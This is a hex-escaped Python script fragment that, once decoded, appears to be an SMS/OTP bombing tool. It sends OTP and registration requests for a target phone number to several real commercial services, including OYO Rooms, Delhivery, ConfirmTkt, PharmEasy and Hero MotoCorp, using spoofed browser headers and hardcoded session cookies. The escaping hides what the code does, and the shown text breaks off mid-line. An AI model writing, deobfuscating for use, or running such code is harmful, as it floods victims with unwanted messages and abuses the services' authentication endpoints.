2\x65\x71\x75\x65\x73\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x6c\x69\x62\x2e\x70\x61\x72\x73\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x65\x71\x75\x65\x73\x74\x73\x0a\x0a\x67\x6c\x6f\x62\x61\x6c\x20\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x73\x0a\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x73\x20\x3d\x20\x7b\x27\x39\x33\x27\x3a\x20\x27\x41\x46\x27\x2c\x27\x33\x35\x35\x27\x3a\x20\x27\x41\x4c\x27\x2c\x27\x32\x31\x33\x27\x3a\x20\x27\x44\x5a\x27\x2c\x27\x33\x37\x36\x27\x3a\x20\x27\x41\x44\x27\x2c\x27\x32\x34\x34\x27\x3a\x20\x27\x41\x4f\x27\x2c\x27\x36\x37\x32\x27\x3a\x20\x27\x41\x51\x27\x2c\x27\x35\x34\x27\x3a\x20\x27\x41\x52\x27\x2c\x27\x33\x37\x34\x27\x3a\x20\x27\x41\x4d\x27\x2c\x27\x32\x39\x37\x27\x3a\x20\x27\x41\x57\x27\x2c\x27\x36\x31\x27\x3a\x20\x27\x41\x55\x27\x2c\x27\x34\x33\x27\x3a\x20\x27\x41\x54\x27\x2c\x27\x39\x39\x34\x27\x3a\x20\x27\x41\x5a\x27\x2c\x27\x39\x37\x33\x27\x3a\x20\x27\x42\x48\x27\x2c\x27\x38\x38\x30\x27\x3a\x20\x27\x42\x44\x27\x2c\x27\x33\x37\x35\x27\x3a\x20\x27\x42\x59\x27\x2c\x27\x33\x32\x27\x3a\x20\x27\x42\x45\x27\x2c\x27\x35\x30\x31\x27\x3a\x20\x27\x42\x5a\x27\x2c\x27\x32\x32\x39\x27\x3a
\x20\x27\x42\x4a\x27\x2c\x27\x39\x37\x35\x27\x3a\x20\x27\x42\x54\x27\x2c\x27\x35\x39\x31\x27\x3a\x20\x27\x42\x4f\x27\x2c\x27\x33\x38\x37\x27\x3a\x20\x27\x42\x41\x27\x2c\x27\x32\x36\x37\x27\x3a\x20\x27\x42\x57\x27\x2c\x27\x35\x35\x27\x3a\x20\x27\x42\x52\x27\x2c\x27\x32\x34\x36\x27\x3a\x20\x27\x49\x4f\x27\x2c\x27\x36\x37\x33\x27\x3a\x20\x27\x42\x4e\x27\x2c\x27\x33\x35\x39\x27\x3a\x20\x27\x42\x47\x27\x2c\x27\x32\x32\x36\x27\x3a\x20\x27\x42\x46\x27\x2c\x27\x32\x35\x37\x27\x3a\x20\x27\x42\x49\x27\x2c\x27\x38\x35\x35\x27\x3a\x20\x27\x4b\x48\x27\x2c\x27\x32\x33\x37\x27\x3a\x20\x27\x43\x4d\x27\x2c\x27\x32\x33\x38\x27\x3a\x20\x27\x43\x56\x27\x2c\x27\x32\x33\x36\x27\x3a\x20\x27\x43\x46\x27\x2c\x27\x32\x33\x35\x27\x3a\x20\x27\x54\x44\x27\x2c\x27\x35\x36\x27\x3a\x20\x27\x43\x4c\x27\x2c\x27\x38\x36\x27\x3a\x20\x27\x43\x4e\x27\x2c\x27\x35\x37\x27\x3a\x20\x27\x43\x4f\x27\x2c\x27\x32\x36\x39\x27\x3a\x20\x27\x4b\x4d\x27\x2c\x27\x36\x38\x32\x27\x3a\x20\x27\x43\x4b\x27\x2c\x27\x35\x30\x36\x27\x3a\x20\x27\x43\x52\x27\x2c\x27\x33\x38\x35\x27\x3a\x20\x27\x48\x52\x27\x2c\x27\x35\x33\x27\x3a\x20\x27\x43\x55\x27\x2c\x27\x35\x39\x39\x27\x3a\x20\x27\x41\x4e\x27\x2c\x27\x33\x35\x37\x27\x3a\x20\x27\x43\x59\x27\x2c\x27\x34\x32\x30\x27\x3a\x20\x27\x43\x5a\x27\x2c\x27\x32\x34\x33\x27\x3a\x20\x27\x43\x44\x27\x2c\x27\x34\x35\x27\x3a\x20\x27\x44\x4b\x27\x2c\x27\x32\x35\x33\x27\x3a\x20\x27\x44\x4a\x27\x2c\x27\x36\x37\x30\x27\x3a\x20\x27\x54\x4c\x27\x2c\x27\x35\x39\x33\x27\x3a\x20\x27\x45\x43\x27\x2c\x27\x32\x30\x27\x3a\x20\x27\x45\x47\x27\x2c\x27\x35\x30\x33\x27\x3a\x20\x27\x53\x56\x27\x2c\x27\x32\x34\x30\x27\x3a\x20\x27\x47\x51\x27\x2c\x27\x32\x39\x31\x27\x3a\x20\x27\x45\x52\x27\x2c\x27\x33\x37\x32\x27\x3a\x20\x27\x45\x45\x27\x2c\x27\x32\x35\x31\x27\x3a\x20\x27\x45\x54\x27\x2c\x27\x35\x30\x30\x27\x3a\x20\x27\x46\x4b\x27\x2c\x27\x32\x39\x38\x27\x3a\x20\x27\x46\x4f\x27\x2c\x27\x36\x37\x39\x27\x3a\x20\x27\x46\x4a\x27\x2c\x27\x33\x35\x38\x27\x3a\x20\x27\x46\x49\x27\x2c\x27\x33\x33\x27\x3a\x20\x27\x46\x52
\x27\x2c\x27\x36\x38\x39\x27\x3a\x20\x27\x50\x46\x27\x2c\x27\x32\x34\x31\x27\x3a\x20\x27\x47\x41\x27\x2c\x27\x32\x32\x30\x27\x3a\x20\x27\x47\x4d\x27\x2c\x27\x39\x39\x35\x27\x3a\x20\x27\x47\x45\x27\x2c\x27\x34\x39\x27\x3a\x20\x27\x44\x45\x27\x2c\x27\x32\x33\x33\x27\x3a\x20\x27\x47\x48\x27\x2c\x27\x33\x35\x30\x27\x3a\x20\x27\x47\x49\x27\x2c\x27\x33\x30\x27\x3a\x20\x27\x47\x52\x27\x2c\x27\x32\x39\x39\x27\x3a\x20\x27\x47\x4c\x27\x2c\x27\x35\x30\x32\x27\x3a\x20\x27\x47\x54\x27\x2c\x27\x32\x32\x34\x27\x3a\x20\x27\x47\x4e\x27\x2c\x27\x32\x34\x35\x27\x3a\x20\x27\x47\x57\x27\x2c\x27\x35\x39\x32\x27\x3a\x20\x27\x47\x59\x27\x2c\x27\x35\x30\x39\x27\x3a\x20\x27\x48\x54\x27\x2c\x27\x35\x30\x34\x27\x3a\x20\x27\x48\x4e\x27\x2c\x27\x38\x35\x32\x27\x3a\x20\x27\x48\x4b\x27\x2c\x27\x33\x36\x27\x3a\x20\x27\x48\x55\x27\x2c\x27\x33\x35\x34\x27\x3a\x20\x27\x49\x53\x27\x2c\x27\x39\x31\x27\x3a\x20\x27\x49\x4e\x27\x2c\x27\x36\x32\x27\x3a\x20\x27\x49\x44\x27\x2c\x27\x39\x38\x27\x3a\x20\x27\x49\x52\x27\x2c\x27\x39\x36\x34\x27\x3a\x20\x27\x49\x51\x27\x2c\x27\x33\x35\x33\x27\x3a\x20\x27\x49\x45\x27\x2c\x27\x39\x37\x32\x27\x3a\x20\x27\x49\x4c\x27\x2c\x27\x33\x39\x27\x3a\x20\x27\x49\x54\x27\x2c\x27\x32\x32\x35\x27\x3a\x20\x27\x43\x49\x27\x2c\x27\x38\x31\x27\x3a\x20\x27\x4a\x50\x27\x2c\x27\x39\x36\x32\x27\x3a\x20\x27\x4a\x4f\x27\x2c\x27\x32\x35\x34\x27\x3a\x20\x27\x4b\x45\x27\x2c\x27\x36\x38\x36\x27\x3a\x20\x27\x4b\x49\x27\x2c\x27\x33\x38\x33\x27\x3a\x20\x27\x58\x4b\x27\x2c\x27\x39\x36\x35\x27\x3a\x20\x27\x4b\x57\x27\x2c\x27\x39\x39\x36\x27\x3a\x20\x27\x4b\x47\x27\x2c\x27\x38\x35\x36\x27\x3a\x20\x27\x4c\x41\x27\x2c\x27\x33\x37\x31\x27\x3a\x20\x27\x4c\x56\x27\x2c\x27\x39\x36\x31\x27\x3a\x20\x27\x4c\x42\x27\x2c\x27\x32\x36\x36\x27\x3a\x20\x27\x4c\x53\x27\x2c\x27\x32\x33\x31\x27\x3a\x20\x27\x4c\x52\x27\x2c\x27\x32\x31\x38\x27\x3a\x20\x27\x4c\x59\x27\x2c\x27\x34\x32\x33\x27\x3a\x20\x27\x4c\x49\x27\x2c\x27\x33\x37\x30\x27\x3a\x20\x27\x4c\x54\x27\x2c\x27\x33\x35\x32\x27\x3a\x20\x27\x4c\x55\x27\x2c\x27\x38
\x35\x33\x27\x3a\x20\x27\x4d\x4f\x27\x2c\x27\x33\x38\x39\x27\x3a\x20\x27\x4d\x4b\x27\x2c\x27\x32\x36\x31\x27\x3a\x20\x27\x4d\x47\x27\x2c\x27\x32\x36\x35\x27\x3a\x20\x27\x4d\x57\x27\x2c\x27\x36\x30\x27\x3a\x20\x27\x4d\x59\x27\x2c\x27\x39\x36\x30\x27\x3a\x20\x27\x4d\x56\x27\x2c\x27\x32\x32\x33\x27\x3a\x20\x27\x4d\x4c\x27\x2c\x27\x33\x35\x36\x27\x3a\x20\x27\x4d\x54\x27\x2c\x27\x36\x39\x32\x27\x3a\x20\x27\x4d\x48\x27\x2c\x27\x32\x32\x32\x27\x3a\x20\x27\x4d\x52\x27\x2c\x27\x32\x33\x30\x27\x3a\x20\x27\x4d\x55\x27\x2c\x27\x32\x36\x32\x27\x3a\x20\x27\x52\x45\x27\x2c\x27\x35\x32\x27\x3a\x20\x27\x4d\x58\x27\x2c\x27\x36\x39\x31\x27\x3a\x20\x27\x46\x4d\x27\x2c\x27\x33\x37\x33\x27\x3a\x20\x27\x4d\x44\x27\x2c\x27\x33\x37\x37\x27\x3a\x20\x27\x4d\x43\x27\x2c\x27\x39\x37\x36\x27\x3a\x20\x27\x4d\x4e\x27\x2c\x27\x33\x38\x32\x27\x3a\x20\x27\x4d\x45\x27\x2c\x27\x32\x31\x32\x27\x3a\x20\x27\x45\x48\x27\x2c\x27\x32\x35\x38\x27\x3a\x20\x27\x4d\x5a\x27\x2c\x27\x39\x35\x27\x3a\x20\x27\x4d\x4d\x27\x2c\x27\x32\x36\x34\x27\x3a\x20\x27\x4e\x41\x27\x2c\x27\x36\x37\x34\x27\x3a\x20\x27\x4e\x52\x27\x2c\x27\x39\x37\x37\x27\x3a\x20\x27\x4e\x50\x27\x2c\x27\x33\x31\x27\x3a\x20\x27\x4e\x4c\x27\x2c\x27\x36\x38\x37\x27\x3a\x20\x27\x4e\x43\x27\x2c\x27\x36\x34\x27\x3a\x20\x27\x4e\x5a\x27\x2c\x27\x35\x30\x35\x27\x3a\x20\x27\x4e\x49\x27\x2c\x27\x32\x32\x37\x27\x3a\x20\x27\x4e\x45\x27\x2c\x27\x32\x33\x34\x27\x3a\x20\x27\x4e\x47\x27\x2c\x27\x36\x38\x33\x27\x3a\x20\x27\x4e\x55\x27\x2c\x27\x38\x35\x30\x27\x3a\x20\x27\x4b\x50\x27\x2c\x27\x34\x37\x27\x3a\x20\x27\x53\x4a\x27\x2c\x27\x39\x36\x38\x27\x3a\x20\x27\x4f\x4d\x27\x2c\x27\x39\x32\x27\x3a\x20\x27\x50\x4b\x27\x2c\x27\x36\x38\x30\x27\x3a\x20\x27\x50\x57\x27\x2c\x27\x39\x37\x30\x27\x3a\x20\x27\x50\x53\x27\x2c\x27\x35\x30\x37\x27\x3a\x20\x27\x50\x41\x27\x2c\x27\x36\x37\x35\x27\x3a\x20\x27\x50\x47\x27\x2c\x27\x35\x39\x35\x27\x3a\x20\x27\x50\x59\x27\x2c\x27\x35\x31\x27\x3a\x20\x27\x50\x45\x27\x2c\x27\x36\x33\x27\x3a\x20\x27\x50\x48\x27\x2c\x27\x34\x38\x27\x3a\x20\x27
\x50\x4c\x27\x2c\x27\x33\x35\x31\x27\x3a\x20\x27\x50\x54\x27\x2c\x27\x39\x37\x34\x27\x3a\x20\x27\x51\x41\x27\x2c\x27\x32\x34\x32\x27\x3a\x20\x27\x43\x47\x27\x2c\x27\x34\x30\x27\x3a\x20\x27\x52\x4f\x27\x2c\x27\x37\x27\x3a\x20\x27\x52\x55\x27\x2c\x27\x32\x35\x30\x27\x3a\x20\x27\x52\x57\x27\x2c\x27\x35\x39\x30\x27\x3a\x20\x27\x4d\x46\x27\x2c\x27\x32\x39\x30\x27\x3a\x20\x27\x53\x48\x27\x2c\x27\x35\x30\x38\x27\x3a\x20\x27\x50\x4d\x27\x2c\x27\x36\x38\x35\x27\x3a\x20\x27\x57\x53\x27\x2c\x27\x33\x37\x38\x27\x3a\x20\x27\x53\x4d\x27\x2c\x27\x32\x33\x39\x27\x3a\x20\x27\x53\x54\x27\x2c\x27\x39\x36\x36\x27\x3a\x20\x27\x53\x41\x27\x2c\x27\x32\x32\x31\x27\x3a\x20\x27\x53\x4e\x27\x2c\x27\x33\x38\x31\x27\x3a\x20\x27\x52\x53\x27\x2c\x27\x32\x34\x38\x27\x3a\x20\x27\x53\x43\x27\x2c\x27\x32\x33\x32\x27\x3a\x20\x27\x53\x4c\x27\x2c\x27\x36\x35\x27\x3a\x20\x27\x53\x47\x27\x2c\x27\x34\x32\x31\x27\x3a\x20\x27\x53\x4b\x27\x2c\x27\x33\x38\x36\x27\x3a\x20\x27\x53\x49\x27\x2c\x27\x36\x37\x37\x27\x3a\x20\x27\x53\x42\x27\x2c\x27\x32\x35\x32\x27\x3a\x20\x27\x53\x4f\x27\x2c\x27\x32\x37\x27\x3a\x20\x27\x5a\x41\x27\x2c\x27\x38\x32\x27\x3a\x20\x27\x4b\x52\x27\x2c\x27\x32\x31\x31\x27\x3a\x20\x27\x53\x53\x27\x2c\x27\x33\x34\x27\x3a\x20\x27\x45\x53\x27\x2c\x27\x39\x34\x27\x3a\x20\x27\x4c\x4b\x27\x2c\x27\x32\x34\x39\x27\x3a\x20\x27\x53\x44\x27\x2c\x27\x35\x39\x37\x27\x3a\x20\x27\x53\x52\x27\x2c\x27\x32\x36\x38\x27\x3a\x20\x27\x53\x5a\x27\x2c\x27\x34\x36\x27\x3a\x20\x27\x53\x45\x27\x2c\x27\x34\x31\x27\x3a\x20\x27\x43\x48\x27\x2c\x27\x39\x36\x33\x27\x3a\x20\x27\x53\x59\x27\x2c\x27\x38\x38\x36\x27\x3a\x20\x27\x54\x57\x27\x2c\x27\x39\x39\x32\x27\x3a\x20\x27\x54\x4a\x27\x2c\x27\x32\x35\x35\x27\x3a\x20\x27\x54\x5a\x27\x2c\x27\x36\x36\x27\x3a\x20\x27\x54\x48\x27\x2c\x27\x32\x32\x38\x27\x3a\x20\x27\x54\x47\x27\x2c\x27\x36\x39\x30\x27\x3a\x20\x27\x54\x4b\x27\x2c\x27\x36\x37\x36\x27\x3a\x20\x27\x54\x4f\x27\x2c\x27\x32\x31\x36\x27\x3a\x20\x27\x54\x4e\x27\x2c\x27\x39\x30\x27\x3a\x20\x27\x54\x52\x27\x2c\x27\x39\x39\x33
\x27\x3a\x20\x27\x54\x4d\x27\x2c\x27\x36\x38\x38\x27\x3a\x20\x27\x54\x56\x27\x2c\x27\x32\x35\x36\x27\x3a\x20\x27\x55\x47\x27\x2c\x27\x33\x38\x30\x27\x3a\x20\x27\x55\x41\x27\x2c\x27\x39\x37\x31\x27\x3a\x20\x27\x41\x45\x27\x2c\x27\x34\x34\x27\x3a\x20\x27\x47\x42\x27\x2c\x27\x31\x27\x3a\x20\x27\x55\x53\x27\x2c\x27\x35\x39\x38\x27\x3a\x20\x27\x55\x59\x27\x2c\x27\x39\x39\x38\x27\x3a\x20\x27\x55\x5a\x27\x2c\x27\x36\x37\x38\x27\x3a\x20\x27\x56\x55\x27\x2c\x27\x33\x37\x39\x27\x3a\x20\x27\x56\x41\x27\x2c\x27\x35\x38\x27\x3a\x20\x27\x56\x45\x27\x2c\x27\x38\x34\x27\x3a\x20\x27\x56\x4e\x27\x2c\x27\x36\x38\x31\x27\x3a\x20\x27\x57\x46\x27\x2c\x27\x39\x36\x37\x27\x3a\x20\x27\x59\x45\x27\x2c\x27\x32\x36\x30\x27\x3a\x20\x27\x5a\x4d\x27\x2c\x27\x32\x36\x33\x27\x3a\x20\x27\x5a\x57\x27\x7d\x0a\x0a\x0a\x64\x65\x66\x20\x74\x65\x73\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x0a\x0a\x64\x65\x66\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x70\x6e\x2c\x6c\x69\x6d\x2c\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x63\x63\x3d\x73\x74\x72\x28\x63\x63\x29\x0a\x20\x20\x20\x20\x70\x6e\x3d\x73\x74\x72\x28\x70\x6e\x29\x0a\x20\x20\x20\x20\x6c\x69\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6c\x69\x6d\x29\x0a\x20\x20\x20\x20\x75\x72\x6c\x20\x3d\x20\x5b\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x79\x6f\x72\x6f\x6f\x6d\x73\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x70\x77\x61\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x6f\x74\x70\x3f\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x3d\x25\x32\x42\x22\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x72\x28\x63\x63\x29\x20\x2b\x20\x22\x26\x6e\x6f\x64\x3d\x34\x26\x70\x68\x6f\x6e\x65\x3d\x22\x20\x2b\x20\x70\x6e\x2c\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x69\x72\x65\x63\x74\x2e\x64\x65\x6c\x68\x69\x76\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x64\x65\x6c\x68\x69\x76\x65\x72\x79\x64\x69\x72\x65\x63\x74\x2f\x6f\x72\x64\x65\x72\x2f\x67\x65
\x6e\x65\x72\x61\x74\x65\x2d\x6f\x74\x70\x3f\x70\x68\x6f\x6e\x65\x4e\x6f\x3d\x22\x20\x2b\x20\x70\x6e\x2c\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x65\x63\x75\x72\x65\x64\x61\x70\x69\x2e\x63\x6f\x6e\x66\x69\x72\x6d\x74\x6b\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x70\x6c\x61\x74\x66\x6f\x72\x6d\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x3f\x6d\x6f\x62\x69\x6c\x65\x4e\x75\x6d\x62\x65\x72\x3d\x22\x20\x2b\x20\x70\x6e\x5d\x0a\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6c\x69\x6d\x20\x3c\x20\x6c\x65\x6e\x28\x75\x72\x6c\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x2e\x75\x72\x6c\x6f\x70\x65\x6e\x28\x73\x74\x72\x28\x75\x72\x6c\x5b\x6c\x69\x6d\x5d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x28\x75\x72\x6c\x6c\x69\x62\x2e\x65\x72\x72\x6f\x72\x2e\x48\x54\x54\x50\x45\x72\x72\x6f\x72\x2c\x20\x75\x72\x6c\x6c\x69\x62\x2e\x65\x72\x72\x6f\x72\x2e\x55\x52\x4c\x45\x72\x72\x6f\x72\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x36\x35\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x36\x35\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27
\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x33\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x6f\x6e\x74\x61\x63\x74\x4e\x75\x6d\x62\x65\x72\x22\x3a\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x61\x75\x74\x68\x2f\x72\x65\x71\x75\x65\x73\x74\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73\x74\x61\x74\x75\x73\x5f\x63\x6f\x64\x65\x3d\x3d\x32\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x34\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20
\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x32\x37\x33\x34\x36\x30\x36\x31\x30\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x37\x32\x35\x37\x34\x32\x39\x39\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x63\x6c\x5f\x61\x75\x27\x3a\x20\x27\x31\x2e\x31\x2e\x38\x33\x33\x35\x35\x36\x36\x36\x30\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x38\x37\x30\x39\x2e\x31\x37\x30\x37\x37\x32\x32\x31\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x50\x48\x50\x53\x45\x53\x53\x49\x44\x27\x3a\x20\x27\x6d\x35\x74\x61\x70\x37\x6e\x72\x37\x35\x62\x32\x65\x68\x63\x6e\x38\x75\x72\x32\x36\x31\x6f\x71\x38\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65
\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x31\x30\x31\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x